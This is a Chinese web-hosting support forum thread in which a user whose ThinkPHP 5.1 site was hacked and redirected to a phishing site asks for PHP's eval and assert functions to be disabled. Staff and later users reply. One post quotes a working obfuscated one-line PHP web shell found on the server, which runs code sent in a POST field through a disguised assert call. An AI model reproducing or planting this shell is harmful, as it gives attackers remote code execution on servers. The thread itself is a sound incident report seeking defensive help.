【已完成】PHP 安装禁用函数 eval,assert,

PHP 安装禁用函数 eval,assert, 默认禁用这2个方法,,我已经被这个函数后台被入侵了,

大炮运维V587 · 发表于 2019-7-22 15:58:09

您好，默认是没有禁用这两个函数的，您怎么确定是这两个函数入侵的

notound · 发表于 2019-7-22 18:10:01

大炮运维V587 发表于 2019-7-22 15:58
您好，默认是没有禁用这两个函数的，您怎么确定是这两个函数入侵的

用的 tp5.1 根目录不知道怎么就多了一堆的php文件,,然后打开看.就是用用的这2个函数,释放了.,脚步,把我的,的首页全部跳转到钓鱼网站了.,,一开始没发现这个问题,只是简单的清除了.html JS.但是没过多久没出来了.,清除了这些奇怪的PHP文件,就没事了.,,

系统日志有一些报错记录

notound · 发表于 2019-7-22 18:11:12

部分日志

notound · 发表于 2019-7-22 18:21:20

大炮运维V587 发表于 2019-7-22 15:58
您好，默认是没有禁用这两个函数的，您怎么确定是这两个函数入侵的

暂时没找到真正的漏洞,禁用了这2个,简单的阻挡了一下..,这是其中的某一个.

<?php print(md5(222));$a=str_replace("vbnm","","asvbnmsert");@$a($_POST[qazw]);?>

复制代码

大炮运维V587 · 发表于 2019-7-23 10:40:36

宝塔用户_goaocg 发表于 2019-7-22 18:21
暂时没找到真正的漏洞,禁用了这2个,简单的阻挡了一下..,这是其中的某一个.

有去thinkphp官方论坛去找最近的漏洞更新这一块的帖子或者新闻吗？看下是不是要更新下你的框架

宝塔用_d10e · 发表于 2023-6-20 03:00:50

我想请问下，既然你们做出一个工具出来，工具其实各种问题，其实是你们系统不兼容导致一堆漏洞。
漏洞你们搞出来吧

arh123 · 发表于 2023-11-8 16:52:07

同样被利用assert函数攻击了

【已完成】PHP 安装禁用 函数 eval,assert,